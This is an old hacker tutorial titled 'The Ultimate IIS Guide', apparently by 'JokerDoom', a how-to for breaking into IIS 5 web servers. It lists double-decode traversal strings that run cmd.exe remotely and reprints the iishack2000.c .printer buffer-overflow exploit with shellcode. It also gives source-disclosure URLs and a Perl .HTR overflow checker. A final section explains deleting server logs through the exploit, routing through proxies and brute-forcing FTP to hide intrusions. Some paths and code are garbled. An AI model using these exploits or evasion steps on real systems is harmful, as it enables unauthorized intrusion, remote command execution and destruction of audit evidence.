This is not a article for a script kiddie. It's
a little late but still applicable today, very applicable.
This article is inteded to be a robust guide for hacking, and
administering IIS 5 servers. So without further adeu The
Ultimate IIS Guide.
Outline:
I. Introduction
II. Information
Gathering
A. Enumeration
B. Identify the directory
structure
C. Is it patched or not?
III. Exploits
A.
Double Decode(Superflous)
B. IDQ Buffer Overflow
C.
Source Code Disclosure Exploits
1. Historical
Importance
2. Impact
3. New Source Code Disclosure
Vulnerabilities
D. WebDav Exlploit
IV. Covering your
Tracks
A. Where are the Logfiles?
B. Why can't I delete
them now!
C. How I will delete them
later.
Foreword
Know your stuff! Remember by
default all actions of yours are logged on IIS 5 and the FTP
server, not sure about the smtp server but who cares, you
can't use VRFY anyway!
Let's say you are hacking a web
server, and you know it is IIS 5. If the IIS Server is running
it has a virtual root. By default the virtual root is
c:inetpubwwwroot. So if you send the
request
GET /frick.html
HTTP/1.0
It checks c:inetpubwwwroot to see if it
has a file named frick.html if it does it sends it. Now if you
request the default document by way of
GET
/ HTTP/1.0
It then looks for the default document.
Which if left unchanged is c:inetpubwwwrootiisstart.asp. You
must manually change the default document to whatever you wish
using the IIS Configuration Dialog. If the pages default.asp
or default.htm exist it will serve them instead. If both exist
it will serve default.asp. This is the default precedence of
the sample pages.
The first things you should
check for while gathering info about the server is if the
administrator has preserved the default directory structure
and such. A virtual directory is a directory that can be
accessed by IIS without the directory actually being in the
virtual root. Virtual Directories that you should check for
first
are:
/_vti_bin/
/scripts/
/msadc/
/iissamples/
/_vti_pvt/
/_vti_cnf/
/_private/
"What
good does this do?" you might ask? Well, first it gives you a
feel for the directory structure of the machine. And second,
if they have failed to patch their machine, you might be able
to exploit it using one of the technique's I describe in this
paper. After checking those first directories, you can check
for some common directories on websites that have chosen not
to keep the default structure such as these.
/cgi-bin/
/bin/ /admin/ /config/ /asp/
/cfg/ /exe/ /php/ /perl/
/binary/
/src/ /tar/ /include/ /topics/ /pwd/
/private/
/conf/ /logs/ /log/ /audio/
/sound/ /pvt/ /images/
/public/ /home/
/cpp/ /db/ /data/ /news/
But don't
let this list limit you. You must know as much as possible
about the system. So use your imaginiation. Ok? Done using
your imagination. Ready for the 31337 stuff? Lets begin. If
the web page has a default under construction page, it is most
likely that the Server was installed by accident and that the
current user of the computer does not know about it. It has
happened many times. At least 5 times with people I know.
However whether or not they installed it by accident, the
known vulnerabilities for the default installation are
worthless if they used the windows update. Which eradicates at
least 10-20 exploits. Also before you start hacking away at
the server you want do a port scan, if you haven't already,
and see if ftp is running it might come in handy as we will
discuss later.
The first exploits I will
discuss are the Double Decode(sometimes called the Superflous
Decode)Directory Traversal Attacks. These are easily
exploitable on a default installation of IIS 5.0. Some people
think that you must have a myriad of tools to hack. This is a
very clean cut example that prooves you can get root, armed
with only a web browser. To exploit this you must first find a
directory with execute permissions. Such directories by
default are: scripts, iissamples, msadc, and _vti_bin. In a
possible exploit request string you could have
"http://55.55.55.55/scripts" & *Exploit String*. I put *A
Exploit String there because there are many to choose from as
listed below.(These exploit strings all execute the dos
command dir, which gives directory
listing)
/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:
/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
I
am going to stop listing exploit strings to preserve brevity.
But the way the exploit works is that IIS checks for "/../../"
(dot-slash) attacks before decoding the request string. So it
does not notice that after it decodes the urlencoded string
that it is in fact allowing a traversal to take place. Maybe
an example will help. Let decode this string
"/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:".
We know that %35 decodes to 5 so replace all the %35s with 5
which looks like this
"/scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:".
Then it checks to make sure it got all the url encoded stuff
and it realizes it forgot to decode %5c, which is a (also IIS
changes /'s to 's). Thus the final path that IIS is left with
is "scripts........winntsystem32cmd.exe?c+dir+c:" which tells
IIS to hop down four directories and then to look in
c:winntsystem32cmd.exe and since the original directory was
scripts and had execute permissions it executes the shell
"cmd.exe" and passes the command line parameters behind the ?
in the http request. The shell command would look like this
"cmd.exe /c dir c:".
This is exploit is only
limited by your imagination. You can copy files, delete them,
disable logging and even delete old logs by utilizing this
technique. I have heard that you can upload files using it as
well but I haven't been able to do it myself. You can make
their floppy drive spin and if they have a disk in at the
time, you can read files off of it easily with a type command!
This is possible with a cd-rom drive too. There is probably a
way to eject the cdrom but I don't know how. More information
on this exploit at end of paper.
The next
exploit is the exploit used by the codered worm to squiggle
its way through the ineternet. And unless you live in front of
your old commodore 64 with no internet connection(which some
of you might judging from the pictures at neworder) you will
no doubt know how effective codered was. The exploit was
dubbed the IDQ .Printer Overflow(Pronounced I Dee Que (dot)
Printer). The exploit was first discovered by www.eeye.com
they released a simple proof of concept. The proof of concept
writes a file to the root of any machine that describes how to
remedy the vulnerability. The exploit is done by making a
request such as
GET /NULL.printer HTTP/1.0
HOST: [420
char Buffer]
At the 420 char mark you have succesfully
overwritten EIP. Then shove in your shellcode and root it! The
following proof of concept was provided by www.eeye.com Note:
I have been unable to get their proof of concept to work and
will provide another and references to others at the end of
this
paper.
Begin File iishack2000.c
#ifdef
_WIN32
#include
#include
#define snprintf _snprintf
#else
#include
#include
#include
#include
#endif
#include
void usage();
unsigned char GetXORValue(char *szBuff, unsigned long filesize);
unsigned char sc[2][315]={ "x8bxc4x83xc0x11x33xc9x66xb9x20x01x80x30x03x40xe2xfa
xebx03x03x03x03x5cx88xe8x82xefx8fx09x03x03x44x80x3cxfcx76xf9x80xc4x07x88xf6x3
0xcax83xc2x07x88x04x8ax05x80xc5x07x80xc4x07xe1xf7x30xc3x8ax3dx80xc5x07x80xc4
x17x8ax3dx80xc5x07x30xc3x82xc4xfcx03x03x03x53x6bx83x03x03x03x69x01x53x53x6bx0
3x03x03x43xfcx76x13xfcx56x07x88xdbx30xc3x53x54x69x48xfcx76x17x50xfcx56x0fx50
xfcx56x03x53xfcx56x0bxfcxfcxfcxfcxcbxa5xebx74x8ex28xeax74xb8xb3xebx74x27x49xe
ax74x60x39x5fx74x74x74x2dx66x46x7ax66x2dx60x6cx6ex2dx77x7bx77x03x6ax6ax70x6b
x62x60x68x31x68x23x2ex23x66x46x7ax66x23x47x6ax64x77x6ax62x6fx23x50x66x60x76x7
1x6ax77x7ax0ex09x23x45x6cx71x23x67x66x77x62x6ax6fx70x23x75x6ax70x6ax77x39x23
x4bx77x77x73x39x2cx2cx74x74x74x2dx66x46x7ax66x2dx60x6cx6ex03x03x03x03x03x03x0
3x03x03x03x03x03x03x03x03x03x03x03x03x03x90x90x90x90x90x90x90x90xcbx4ax42x6c
x90x90x90x90x66x81xecx14x01xffxe4x03x03x03x03x03x03x03x03x03x03x03x03x03x03x0
3x03x03x03x03x03x03x03x00",
"x8bxc4x83xc0x11x33xc9x66xb9x20x01x80x30x03x40xe2xfa
xebx03x03x03x03x5cx88xe8x82xefx8fx09x03x03x44x80x3cxfcx76xf9x80xc4x07x88xf6x3
0xcax83xc2x07x88x04x8ax05x80xc5x07x80xc4x07xe1xf7x30xc3x8ax3dx80xc5x07x80xc4
x17x8ax3dx80xc5x07x30xc3x82xc4xfcx03x03x03x53x6bx83x03x03x03x69x01x53x53x6bx0
3x03x03x43xfcx76x13xfcx56x07x88xdbx30xc3x53x54x69x48xfcx76x17x50xfcx56x0fx50
xfcx56x03x53xfcx56x0bxfcxfcxfcxfcx50x33xebx74xf7x86xebx74x2exf0xebx74x4cx30xe
bx74x60x39x5fx74x74x74x2dx66x46x7ax66x2dx60x6cx6ex2dx77x7bx77x03x6ax6ax70x6b
x62x60x68x31x68x23x2ex23x66x46x7ax66x23x47x6ax64x77x6ax62x6fx23x50x66x60x76x7
1x6ax77x7ax0ex09x23x45x6cx71x23x67x66x77x62x6ax6fx70x23x75x6ax70x6ax77x39x23
x4bx77x77x73x39x2cx2cx74x74x74x2dx66x46x7ax66x2dx60x6cx6ex03x03x03x03x03x03x0
3x03x03x03x03x03x03x03x03x03x03x03x03x03x90x90x90x90x90x90x90x90xcbx4ax42x6c
x90x90x90x90x66x81xecx14x01xffxe4x03x03x03x03x03x03x03x03x03x03x03x03x03x03x0
3x03x03x03x03x03x03x03x00"};
main (int argc, char *argv[])
{
char request_message[500];
int X,sock,sp=0;
unsigned short serverport=htons(80);
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr attack;
#ifdef
_WIN32
WORD werd;
WSADATA wsd;
werd= MAKEWORD(2,0);
WSAStartup(werd,&wsd);
#endif
printf("iishack2000
- Remote .printer overflow in 2k sp0 and sp1
");
printf("Vulnerability
found by Riley Hassell
");
printf("Exploit
by Ryan Permeh
");
if(argc < 4) usage();
if(argv[1] != NULL)
{
nametocheck = gethostbyname (argv[1]);
memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);
}
else usage();
if(argv[2] != NULL)
{
serverport=ntohs((unsigned short)atoi(argv[2]));
}
if(argv[3] != NULL)
{
sp=atoi(argv[3]);
}
printf("Sending
string to overflow sp %d for host: %s on port:%d
",sp,inet_ntoa(attack),htons
(serverport));
memset(request_message,0x00,500);
snprintf(request_message,500,"GET
/null.printer HTTP/1.1 Host: %s
",sc[sp]);
sock = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr = attack.s_addr;
serv_addr.sin_port = serverport;
X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
if(X==0)
{
send(sock,request_message,strlen(request_message)*sizeof(char),0);
printf("Sent
overflow, now look on the c: drive of %s for www.eEye.com.txt
",inet_nto
a(attack));
printf("If
the file doesn't exist, the server may be patched, or may be a
different s
ervice pack (try again with %d as the service
pack)
",sp==0?1:0);
}
else
{
printf("Couldn't
connect
",inet_ntoa(attack));
}
#ifdef
_WIN32
closesocket(sock);
#else
close(sock);
#endif
return 0;
}
void usage()
{
printf("Syntax: iishack2000
");
printf("Example:
iishack2000 127.0.0.1 80 0
");
printf("Example:
iishack2000 127.0.0.1 80 1
");
exit(1);
}
End of File
The
next series of exploits will focus on script source code
disclosure. The first exploit for this is caused by a sample
script that comes with IIS 5.0. It's name is codebrws.asp.
codebrws.asp was meant to show people how to create simple
scripts, and is also able to format already created scripts
into nice colors, anyway, it opens the file specified in the
url variable
&source.
/iissamples/sdk/asp/docs/codebrws.asp?source=/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp?source=/iissamples/%c0%ae%c0%ae/iisstart.asp
The
next vulnerability is releatively new, so I won't pretend to
have expereince exploiting it. It's called the HTR Chunked
Encoding Buffer overflow and I have a proof of concept right
here for you. The Information you need should be in the
script. It is in perl, sorry windows users, but if you use
windows and still want to try to run it, goto
activestate.com
Begin File
HTR_Exploit.pl
#!/usr/bin/perl
########################################################################
#
(c) Filip Maertens/CISSP, .HTR Heap Overflow checker.
#
# DISCLAIMER: This tool is only to be used for legitimate
purposes only.
# This is considered as an intrusive,
so please adhere to the laws and
#
regulations applicable in your country. Oh, and
honey, there is pizza
# in the
fridge...
#
# CREDITS: @stake/KPMG for the
advisory
# Thor
Larholm for the patch identification
remark
#
########################################################################
use Socket;
print "iischeck.pl
| Microsoft .HTR Heap Overflow Checker |
-----------------------------------------------------------------------
";
$host= @ARGV[ 0 ];
$method= @ARGV[ 2 ];
my $target = inet_aton($host);
$port = 80;
$requestmethod[0] = "GET";
$requestmethod[1] = "HEAD";
$requestmethod[2] = "POST";
#
Initializing strings &
vars
$patchedstring = "InsertElementAnchor";
$nonpatchedstring = "document.write";
$bogusurl = "/xxxiischeckxxx";
#
Main loop of rotten
code
if ($host ne "") {
print " -- Checking hostname: $host
";
$rawrequest = "$requestmethod[$method] $bogusurl HTTP/1.1
Client-Agent:iischeck.pl Host:$host
";
@results = sendrequestandgetanswer($rawrequest);
$criticalline = $results[49]; #
49, since HTTP headers are
included
if ($results[2] =~ "IIS") {
SWITCH: {
if ($criticalline =~ $nonpatchedstring) { $patched = "
-- Status: System
vulnerable."; last SWITCH; }
if ($criticalline =~ $patchedstring) { $patched = "
-- Status: System MS02-18
patched."; last SWITCH; }
$patched = "
-- Status: Cannot identify patch
level";
}
print "$patched
";
} else {
print "
-- Error: System is not a Windows/IIS host.
";
}
} else {
showusage();
}
exit(0);
#######:
Functions used by iischeck.pl
:#######
sub showusage
{
print "Usage:
iischeck [hostname] -method [method]
";
}
sub sendrequestandgetanswer
{
my ($rawrequest)= @_;
@lines = sendrawandgetanswer ($rawrequest);
return @lines;
}
sub sendrawandgetanswer
{
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') || 0) || die("
-- Error in creating socket
");
if (connect(S,pack "SnA4x8",2,$port,$target))
{
my @in="";
select(S);
$|=1;
print $pstr;
{
push @in,$_;
last if ($line=~ /^[rn]+$/ );
}
select(STDOUT);
return @in;
}
else
{
die(" -- Error connecting to: $host
");
}
}
sub sendraw
{
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') || 0) || die("Socket
problems
");
if (connect(S,pack "SnA4x8",2,$port,$target))
{
my @in="";
select(S);
$|=1;
print $pstr;
}
else
{
die("connect
problems
");
}
}
End of File
Well
I know the last one needs more info, but hey, would it be fun
If I spoonfed ya'll all the way? That exploit unlike the
other's listed will even work with IIS 5.1, which is the web
server that comes with Windows XP
Professional.
So you got in? You have at
this point (hopefully) found a hole in this IIS server and
have or are going to exploit it. What you do next is up to
you. But bear in mind that, by default, all actions on IIS 5
and it's FTP server are logged. And that is what the next
seciton is about.
The web server log resides in
"c:winntsystem32logfilesw3svc1". The FTP server log is stored
in "c:winntsystem32logfilesftpsvc1". They log you rip address
and what request you made to the server. By default they do
not examine your request to see if you used a proxy. The
logfiles are named according to the date. Everyday IIS creates
a new logfile. So, if you did some naughty stuff today, find a
proxy, come back tomorrow, and use these command's by way of
the double decode exploit, if they are available. If they
aren't available, because no directories, have execute
permission's you can brute force the FTP server(use a ftp
proxy for this one to!), and then when you get admin
priveleges, you can delete the logs, or modify them, and don't
forget to save some of them to your box, many times, you will
find boxe's ips that have fallen victim to the codeRed worm,
and those are vulnerable to the double decode attack, and the
IDQ buffer overflow, and most of the time are complete default
IIS 5 installations.
Useful Double Decode
Command's(The command comes after the exploit string)
By
the way I haven't tested all of these but I have tested as
many as I could, the reason I couldn't test them all was
because
my server that I was using was shut down
while I was testing
them.
/cmd.exe?/c+dir+c:
/cmd.exe?/c+type+....win.ini (Try Different combinations with this one, for some reason c:pathfilename didn't
work in my
test
/cmd.exe?/c+type+....config.sys
/cmd.exe?/c+dir+c:WinNTSystem32LogFiles
/cmd.exe?/c+del+LogFilesw3svc1ex030601.log
or
/cmd.exe?/c+del+c:WinNTSystem32Logfilesex030601.log
The
last one was just an example, but remember your going to have
to find out the names of the logfiles so you can delete them
yourself. Remember though, you can't delete the most recent
logfile as it is being used by IIS, so if your unable to
modify win.ini to delete it. And don't forget, search google
for the command's that let you upload files using tftp. I hope
you have at least been enlightened in some way about IIS 5 in
this paper, thank you If you think this paper could use a
little more before being posted or whatever just send it back
with comments I will revise it if
needed.
Shoutz: nex(dv2), e-eye, packetstorm,
neworder, blacksun, irc.freenode.com, and the box
networks
JokerDoom